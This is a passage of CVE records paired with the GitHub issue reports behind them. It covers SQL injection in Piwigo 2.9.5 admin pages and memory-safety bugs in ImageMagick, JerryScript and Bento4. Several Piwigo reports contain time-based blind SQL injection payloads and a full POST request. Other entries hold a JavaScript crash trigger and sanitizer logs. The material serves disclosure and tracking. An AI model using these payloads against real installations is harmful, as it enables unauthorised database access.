5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1010" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1010
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi, I found a sql injection vulnerability in cat_move.php: The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability. **replace any of the following parameter in POST requests to reappear the vulnerability:** ```selection%5B%5D=1)` and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23``` or ```parent=1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23``` I use 'sqlmap' to reappear the vulnerability: ![4](https://user-images.githubusercontent.com/34082644/57218384-c143eb00-7027-11e9-8f33-882af04aff4b.png) ![6](https://user-images.githubusercontent.com/34082644/57218549-2566af00-7028-11e9-81b8-df5313785c02.png)
SQL injection in cat_move.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1010/comments
2
2019-05-06T10:00:18Z
2019-08-12T14:24:47Z
https://github.com/Piwigo/Piwigo/issues/1010
440,625,122
1,010
CVE-2020-19215
2022-05-06T14:15:08.313
SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1011" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1011
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php 1 : request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album then move the album from the right to the left payload: ```1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))``` or use 'sqlmap' ![image](https://user-images.githubusercontent.com/34082644/57291554-41cf1e00-70f2-11e9-8938-125b11837e26.png) ![image](https://user-images.githubusercontent.com/34082644/57291568-485d9580-70f2-11e9-9780-95f438e620cb.png) ![image](https://user-images.githubusercontent.com/34082644/57291587-514e6700-70f2-11e9-8b79-225b7e75ab0d.png) ![image](https://user-images.githubusercontent.com/34082644/57291596-54e1ee00-70f2-11e9-9c2c-2badf3169819.png) 2: same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album then move the album from the right to the left payload: ```1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))``` or use 'sqlmap' ![image](https://user-images.githubusercontent.com/34082644/57291880-ee110480-70f2-11e9-84f3-58c089b271c9.png) ![image](https://user-images.githubusercontent.com/34082644/57291889-f36e4f00-70f2-11e9-9a9f-5821e15773d0.png) ![image](https://user-images.githubusercontent.com/34082644/57291899-f9fcc680-70f2-11e9-9bee-baa73064e280.png) ![image](https://user-images.githubusercontent.com/34082644/57291911-008b3e00-70f3-11e9-9def-ed25812f5526.png)
SQL injection in user/group permissions manager
https://api.github.com/repos/Piwigo/Piwigo/issues/1011/comments
3
2019-05-07T10:09:41Z
2019-08-12T14:46:29Z
https://github.com/Piwigo/Piwigo/issues/1011
441,151,429
1,011
CVE-2020-19217
2022-05-06T14:15:08.407
SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1012" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1012
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
hi,There is a vulnerability in the admin/batch_manager.php. ![image](https://user-images.githubusercontent.com/34082644/57359656-d006db00-71aa-11e9-9f42-0509bafceed7.png) I didn't find the full trigger request in the browser, so I added the ‘&filter_category_use=on’ parameter to the request based on the code. ``` POST /admin.php?page=batch_manager HTTP/1.1 Host: 10.150.10.186:30002 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://10.150.10.186:30002/admin.php?page=batch_manager Content-Type: application/x-www-form-urlencoded Content-Length: 695 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=85b6lvm6f6nqvji17k04ugkdu0 Connection: close Upgrade-Insecure-Requests: 1 start=0&pwg_token=438d258aad10f5b13c74425475163e4e&filter_prefilter_use=on&filter_prefilter=last_import&filter_duplicate s_date=on&filter_category=1&tag_mode=AND&filter_level=03&filter_dimension_min_width=145&filter_dimension_max_width=2560& filter_dimension_min_height=91&filter_dimension_max_height=1440&filter_dimension_min_ratio=1.29&filter_dimension_max_rat io=1.77&filter_search_use=on&q=&filter_filesize_use=on&filter_category_use=on&filter_filesize_min=1.3&filter_filesize_ma x=1.3&submitFilter=&selectAction=-1&associate=1&dissociate=1&author=&title=&date_creation=2019-05-08+00%3A00%3A00&level= 0&regenerateSuccess=0&regenerateError=0 ``` ![image](https://user-images.githubusercontent.com/34082644/57359720-f62c7b00-71aa-11e9-9e85-507ef7179fff.png) ![image](https://user-images.githubusercontent.com/34082644/57359730-fcbaf280-71aa-11e9-9f31-6d84edf9a6af.png) ![image](https://user-images.githubusercontent.com/34082644/57359741-03e20080-71ab-11e9-8c2d-d279167aded3.png) ![image](https://user-images.githubusercontent.com/34082644/57359747-080e1e00-71ab-11e9-82a1-47ffc7557058.png)
SQL injection in admin/batch_manager.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1012/comments
1
2019-05-08T08:06:27Z
2019-08-12T12:53:25Z
https://github.com/Piwigo/Piwigo/issues/1012
441,604,948
1,012
CVE-2022-28463
2022-05-08T23:15:17.820
ImageMagick 7.1.0-27 is vulnerable to Buffer Overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/ca3654ebf7a439dc736f56f083c9aa98e4464b7f" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/4988" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/e6ea5876e0228165ee3abc6e959aa174cee06680" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00018.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00020.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.1.0-27:*:*:*:*:*:*:*", "matchCriteriaId": "0B494258-E7BF-4584-800D-D2D893003E17", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/4988
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.0-27 ### Operating system Linux ### Operating system, version and so on Linux d477f3580ae9 5.4.0-105-generic #119~18.04.1-Ubuntu SMP Tue Mar 8 11:21:24 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ### Description Hello, We are currently working on fuzz testing feature, and we found a heap-use-after-free on ImageMagick. ### Steps to Reproduce ``` ➜ oss-fuzz git:(master) ✗ python infra/helper.py reproduce imagemagick encoder_cin_fuzzer ./build/out/imagemagick/crash-772bceeffddfb027f3363fb5be34fa55195a6e1a INFO:root:Running: docker run --rm --privileged -i -v /work/fuzz/oss-fuzz/build/out/imagemagick:/out -v /work/fuzz/oss-fuzz/build/out/imagemagick/crash-772bceeffddfb027f3363fb5be34fa55195a6e1a:/testcase -t gcr.io/oss-fuzz-base/base-runner reproduce encoder_cin_fuzzer -runs=100. + FUZZER=encoder_cin_fuzzer + shift + '[' '!' -v TESTCASE ']' + TESTCASE=/testcase + '[' '!' -f /testcase ']' + export RUN_FUZZER_MODE=interactive + RUN_FUZZER_MODE=interactive + export FUZZING_ENGINE=libfuzzer + FUZZING_ENGINE=libfuzzer + export SKIP_SEED_CORPUS=1 + SKIP_SEED_CORPUS=1 + run_fuzzer encoder_cin_fuzzer -runs=100 /testcase /out/encoder_cin_fuzzer -rss_limit_mb=2560 -timeout=25 -runs=100 /testcase -close_fd_mask=3 < /dev/null INFO: Running with entropic power schedule (0xFF, 100). INFO: Seed: 543797506 INFO: Loaded 1 modules (228899 inline 8-bit counters): 228899 [0x1f6a8b0, 0x1fa26d3), INFO: Loaded 1 PC tables (228899 PCs): 228899 [0x1fa26d8,0x2320908), /out/encoder_cin_fuzzer: Running 1 inputs 100 time(s) each. Running: /testcase ================================================================= ==18==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b000001408 at pc 0x000000c77cfc bp 0x7ffd2026fd90 sp 0x7ffd2026fd88 READ of size 1 at 0x61b000001408 thread T0 SCARINESS: 12 (1-byte-read-heap-buffer-overflow) #0 0xc77cfb in PushLongPixel /src/imagemagick/./MagickCore/quantum-private.h:256:27 #1 0xc77cfb in ImportRGBQuantum /src/imagemagick/MagickCore/quantum-import.c:4061:15 #2 0xc77cfb in ImportQuantumPixels /src/imagemagick/MagickCore/quantum-import.c:4774:7 #3 0xd8a7e0 in ReadCINImage /src/imagemagick/coders/cin.c:774:12 #4 0x9cfca1 in ReadImage /src/imagemagick/MagickCore/constitute.c:728:15 #5 0x94d996 in BlobToImage /src/imagemagick/MagickCore/blob.c:475:13 #6 0x81e2b1 in Magick::Image::read(Magick::Blob const&) /src/imagemagick/Magick++/lib/Image.cpp:4043:12 #7 0x7ea865 in LLVMFuzzerTestOneInput /src/imagemagick/Magick++/fuzz/encoder_fuzzer.cc:66:11 #8 0x6e0502 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:611:15 #9 0x6cb462 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:324:6 #10 0x6d0ccc in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:860:9 #11 0x6fa2b2 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 #12 0x7f40139740b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #13 0x6a9bad in _start (/out/encoder_cin_fuzzer+0x6a9bad) DEDUP_TOKEN: PushLongPixel--ImportRGBQuantum--ImportQuantumPixels 0x61b000001408 is located 0 bytes to the right of 1416-byte region [0x61b000000e80,0x61b000001408) allocated by thread T0 here: #0 0x7e678d in operator new[](unsigned long) /src/llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:98:3 #1 0x810ed0 in Magick::BlobRef::BlobRef(void const*, unsigned long) /src/imagemagick/Magick++/lib/BlobRef.cpp:30:12 #2 0x80ff7d in Magick::Blob::Blob(void const*, unsigned long) /src/imagemagick/Magick++/lib/Blob.cpp:27:18 #3 0x7ea859 in LLVMFuzzerTestOneInput /src/imagemagick/Magick++/fuzz/encoder_fuzzer.cc:64:22 #4 0x6e0502 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:611:15 #5 0x6cb462 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:324:6 #6 0x6d0ccc in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:860:9 #7 0x6fa2b2 in main /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 #8 0x7f40139740b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) DEDUP_TOKEN: operator new[](unsigned long)--Magick::BlobRef::BlobRef(void const*, unsigned long)--Magick::Blob::Blob(void const*, unsigned long) SUMMARY: AddressSanitizer: heap-buffer-overflow /src/imagemagick/./MagickCore/quantum-private.h:256:27 in PushLongPixel Shadow bytes around the buggy address: 0x0c367fff8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fff8280: 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==18==ABORTING ``` ### Images [poc.zip](https://github.com/ImageMagick/ImageMagick/files/8347686/poc.zip)
AddressSanitizer: heap-buffer-overflow /src/imagemagick/./MagickCore/quantum-private.h:256:27 in PushLongPixel
https://api.github.com/repos/ImageMagick/ImageMagick/issues/4988/comments
3
2022-03-25T05:27:23Z
2022-04-30T09:27:47Z
https://github.com/ImageMagick/ImageMagick/issues/4988
1,180,362,220
4,988
CVE-2021-42863
2022-05-12T13:15:07.687
A buffer overflow in ecma_builtin_typedarray_prototype_filter() in JerryScript version fe3a5c0 allows an attacker to construct a fake object or a fake arraybuffer with unlimited size.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4793" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/pull/4794" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "243328D8-E703-4355-9970-BB352D6E99B1", "versionEndExcluding": "2021-10-15", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4793
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d4231e7 ###### Build platform Ubuntu 20.04.3 LTS (Linux 5.11.0-34-generic x86_64) ###### Build steps ```sh ./tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --clean --debug --strip=off --logging=on --error-messages=on \ --compile-flag=-fsanitize=address --stack-limit=20 ``` ###### Test case ```javascript function test(constructor, constructor2, from = [1, 2, 3, 4, 5]) { var modifiedConstructor = new constructor(from); modifiedConstructor.constructor = constructor2; modifiedConstructor.filter(x => x % 2 == 0); } test(Float64Array, Float32Array); ``` ###### Output ICE: Assertion 'object_p->type_flags_refs >= ECMA_OBJECT_REF_ONE' failed at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/base/ecma-gc.c(ecma_deref_object):158. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ###### Backtrace #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007f2898e32859 in __GI_abort () at abort.c:79 #2 0x0000558795034682 in jerry_port_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/sy/Documents/jerry/jerryscript/jerry-port/default/default-fatal.c:30 #3 0x0000558794fccb4a in jerry_fatal (code=ERR_FAILED_INTERNAL_ASSERTION) at /home/sy/Documents/jerry/jerryscript/jerry-core/jrt/jrt-fatals.c:63 #4 0x0000558794fccba0 in jerry_assert_fail (assertion=0x558795036db0 "object_p->type_flags_refs >= ECMA_OBJECT_REF_ONE", file=0x558795036d68 "/home/sy/Documents/jerry/jerryscript/jerry-core/ecma/base/ecma-gc.c", function=0x558795052a90 <__func__.7709> "ecma_deref_object", line=158) at /home/sy/Documents/jerry/jerryscript/jerry-core/jrt/jrt-fatals.c:87 #5 0x0000558794f80b25 in ecma_deref_object (object_p=0x55879507b990 <jerry_global_heap+1872>) at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/base/ecma-gc.c:158 #6 0x0000558794f92037 in ecma_free_value (value=1875) at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1145 #7 0x0000558794f92167 in ecma_fast_free_value (value=1875) at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1184 #8 0x0000558794fea587 in opfunc_call (frame_ctx_p=0x7ffcb43d6230) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:834 #9 0x0000558794ff5e4b in vm_execute (frame_ctx_p=0x7ffcb43d6230) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:5271 #10 0x0000558794ff60ea in vm_run (shared_p=0x7ffcb43d63a0, this_binding_value=11, lex_env_p=0x55879507b330 <jerry_global_heap+240>) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:5372 #11 0x0000558794fb1369 in ecma_op_function_call_simple (func_obj_p=0x55879507b530 <jerry_global_heap+752>, this_arg_value=72, arguments_list_p=0x7ffcb43d651c, arguments_list_len=2) at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1145 #12 0x0000558794fb1a19 in ecma_op_function_call (func_obj_p=0x55879507b530 <jerry_global_heap+752>, this_arg_value=72, arguments_list_p=0x7ffcb43d651c, arguments_list_len=2) at /home/sy/Documents/jerry/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1395 #13 0x0000558794fea4a9 in opfunc_call (frame_ctx_p=0x7ffcb43d64d0) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:799 #14 0x0000558794ff5e4b in vm_execute (frame_ctx_p=0x7ffcb43d64d0) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:5271 #15 0x0000558794ff60ea in vm_run (shared_p=0x7ffcb43d65e0, this_binding_value=11, lex_env_p=0x55879507b330 <jerry_global_heap+240>) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:5372 #16 0x0000558794fe99c1 in vm_run_global (bytecode_p=0x55879507b6a8 <jerry_global_heap+1128>, function_object_p=0x55879507b520 <jerry_global_heap+736>) at /home/sy/Documents/jerry/jerryscript/jerry-core/vm/vm.c:306 #17 0x0000558794f77256 in jerry_run (func_val=739) at /home/sy/Documents/jerry/jerryscript/jerry-core/api/jerry.c:588 #18 0x0000558794f73d63 in main (argc=2, argv=0x7ffcb43d69c8) at /home/sy/Documents/jerry/jerryscript/jerry-main/main-jerry.c:173 #19 0x00007f2898e340b3 in __libc_start_main (main=0x558794f73889 <main>, argc=2, argv=0x7ffcb43d69c8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7ffcb43d69b8) at ../csu/libc-start.c:308 #20 0x0000558794f737ce in _start () ###### Expected behavior memcopy() in ecma-builtin-typearray-prototype.c:467 should check type of the array give backed by filter. We have already made this crash an arbitrary read/write, if you need that PoC, please contact us.
Buffer-overflow in ecma-builtin-typedarray-prototype.c
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4793/comments
0
2021-10-13T02:35:23Z
2022-12-31T04:40:51Z
https://github.com/jerryscript-project/jerryscript/issues/4793
1,024,703,352
4,793
CVE-2022-29017
2022-05-16T14:15:07.863
Bento4 v1.6.0.0 was discovered to contain a segmentation fault via the component /x86_64/multiarch/strlen-avx2.S.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/691" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "23A9C6DA-83D1-4248-B977-29C56C791132", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/691
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
SUMMARY: AddressSanitizer: SEGV /build/glibc-sMfBJT/glibc-2.31/string/../sysdeps/x86_64/multiarch/strlen-avx2.S:65 - Version ``` ➜ mp42hls_test git:(master) ✗ ./mp42hls MP4 To HLS File Converter - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2018 Axiomatic Systems, LLC ``` branch 4d8e1fc - Platform ``` ➜ gcc --version gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 Copyright (C) 2017 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. ➜ uname -r 5.4.0-91-generic ➜ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.5 LTS Release: 18.04 Codename: bionic ``` - Steps to reproduce ``` mkdir build cd build cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" make ./mp42hls --encryption-iv-mode 